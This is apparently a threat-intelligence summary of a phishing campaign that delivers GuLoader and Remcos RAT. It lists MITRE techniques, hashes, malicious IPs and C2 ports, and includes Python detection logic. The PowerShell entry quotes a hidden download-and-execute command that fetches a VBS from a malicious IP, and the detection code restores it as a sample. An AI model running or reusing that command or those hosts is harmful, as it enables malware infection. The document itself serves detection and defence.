A CYFIRMA report details a phishing campaign that delivers GuLoader to download Remcos RAT via a heavily obfuscated VBScript loader. The operation uses PowerShell, LNK shortcuts, and in-memory process injection to establish C2 and persistence. #GuLoader #RemcosRAT #UNC045 #Leviathan #APT40 #SleeperCell #TICK
Key points
- Malicious PDF delivered by email redirects to a cloud-based Mega.nz drive to download a password-protected ZIP.
- Inside the ZIP is a shortcut (LNK) that uses PowerShell to download a heavily obfuscated VBS script (GuLoader) and execute it.
- GuLoader injects into ieinstal.exe and establishes a connection to a hard-coded C2 server.
- The campaign primarily delivers Remcos RAT and has been active since late 2022, with Chinese nation-state actors observed using Remcos and other malware in targeted campaigns.
- Multiple URLs and a set of VBS payloads (skivesvamps.vbs, Filmist.vbs, Sacramentum.vbs) are hosted on a malicious IP, with several associated MD5 hashes and domain/URL indicators.
- Campaigns show multi-stage deployment, registry persistence, and ongoing exfiltration/remote-control capabilities against a broad set of industries and geographies.
- MITRE-aligned techniques include phishing, PowerShell and VB execution, registry persistence, obfuscation, registry discovery, and C2 via application-layer protocols and non-standard ports.
MITRE Techniques
- [T1566] Phishing – The malicious PDF file is delivered via email to victim…
- [T1059.001] PowerShell – The LNK executes a PowerShell command to download and run the VBS loader: “C[:]\Windows\System32\WindowsPowerShell\v1.0\powershell[.]exe -windowstyle hidden Invoke-WebRequest http[:]//194[.]180[.]48[.]211/lmp/skivesvamps.vbs -Outfile %temp%\prof.vbs; Start-Process %temp%\prof[.]vbs”
- [T1059.006] Visual Basic – GuLoader uses Visual Basic Script (VBS) to deliver payloads and execute in memory; the VBS is heavily obfuscated.
- [T1547.001] Registry Run Keys – Malware creates a registry entry at “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” for persistence.
- [T1027.002] Obfuscated Files or Information – GuLoader uses a polymorphic shellcode loader; the shellcode is encrypted and heavily obfuscated to evade detection.
- [T1012] Query Registry – The first stage VBS writes data into the registry (e.g., “HKEY_CURRENT_USERBrugerudgaveStudenterhuernes85Journalism”).
- [T1082] System Information Discovery – Part of the discovery/credentialing phase observed in the campaign’s tooling.
- [T1071] Application Layer Protocol – The injected/runner process communicates with its C2 server over HTTP(S) protocols to fetch payloads.
- [T1571] Non-Standard Port – C2 communications use non-standard ports (e.g., 4890) on IPs like 84.21.172.49:4890.
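As an added illustration (not code from CYFIRMA or the report), the chain summarised in T1059.001, T1547.001 and T1571 above expressed as detection logic over constructed process-creation and network events: the command line, download IP and C2 port are the ones quoted above; the regexes, the benign comparison command and the ieinstal.exe path are assumptions.

```python
import re

# Constructed sample events (not from the report); the command line reproduces the
# LNK -> PowerShell -> VBS chain quoted above with its path backslashes restored.
SUSPICIOUS_CMD = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "
    r"Invoke-WebRequest http://194.180.48.211/lmp/skivesvamps.vbs -Outfile %temp%\prof.vbs; "
    r"Start-Process %temp%\prof.vbs"
)
BENIGN_CMD = (  # assumed admin script, for comparison
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile "
    r"-File C:\Scripts\inventory.ps1"
)
NET_EVENTS = [  # assumed Sysmon-style network events; ieinstal.exe path is the standard install path
    {"image": r"C:\Program Files\Internet Explorer\ieinstal.exe", "dip": "84.21.172.49", "dport": 4890},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dip": "203.0.113.7", "dport": 443},
]

# One regex per observable in the chain, named so an alert explains why it fired.
CHECKS = [
    ("hidden_window",  re.compile(r"-w\w*\s+hidden", re.I)),  # -windowstyle hidden / -w hidden
    ("web_download",   re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString", re.I)),
    ("bare_ip_url",    re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I)),  # raw IP, no hostname
    ("script_to_temp", re.compile(r"-Outfile\s+\S*?%temp%\\?[^\s;]+\.vbs", re.I)),
    ("launch_script",  re.compile(r"Start-Process\s+\S+\.vbs", re.I)),
]

def assess_powershell_cmdline(cmdline: str) -> list:
    """Return the names of chain indicators present in one PowerShell command line."""
    return [name for name, rx in CHECKS if rx.search(cmdline)]

def is_guloader_like(cmdline: str, min_hits: int = 3) -> bool:
    """Alert only when several independent indicators co-occur: a hidden window or a
    single download on its own is common in legitimate administration scripts."""
    return len(assess_powershell_cmdline(cmdline)) >= min_hits

def flag_c2_connections(events, expected_ports=(80, 443)) -> list:
    """Return (image, 'ip:port') where the injection host named in the report
    (ieinstal.exe) reaches a port outside the ones a browser helper would use (T1571)."""
    return [
        (ev["image"], f'{ev["dip"]}:{ev["dport"]}')
        for ev in events
        if ev["image"].lower().endswith("ieinstal.exe") and ev["dport"] not in expected_ports
    ]

if __name__ == "__main__":
    for cmd in (SUSPICIOUS_CMD, BENIGN_CMD):
        print(is_guloader_like(cmd), assess_powershell_cmdline(cmd))
    print(flag_c2_connections(NET_EVENTS))
```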
Indicators of Compromise
- [MD5] – PDF File – FA29A3514315DAA300A2F51EFFED36B7, 7B458417E456EDFB8816B9F063DD7F4A, and 5 more hashes
- [MD5] – skivesvamps.vbs / prof.vbs – 7B458417E456EDFB8816B9F063DD7F4A
- [MD5] – DrWSIClDcaj128.psm – 4937FCED9860DEE34E4A62036D7EB3E4
- [URL] – http://194.180.48.211/lmp/ (Invoke WebRequest to fetch VBS)
- [URL] – http://194.180.48.211/tvic/
- [URL] – http://194.180.48.211/Axel/
- [Domain] – mega.nz – Cloud drive used to host the ZIP and related files
- [IP] – 194.180.48.211 – Malicious distribution/download host
- [IP] – 178.237.33.50 – Connection target (Remcos C2)
- [IP:Port] – 45.81.39.21:28465 – C2
- [IP:Port] – 84.21.172.49:4890 – C2
- [IP:Port] – 37.0.14.209:6299 – C2
- [File Name] – Purchase Order.zip (ZIP file found on Mega.nz)
- [File Name] – ieinstal.exe (Injected process that connects to C2)
- [File Name] – Purchase Order.pdf (LNK target)
Read more: https://www.cyfirma.com/outofband/guloader-deploying-remcos-rat/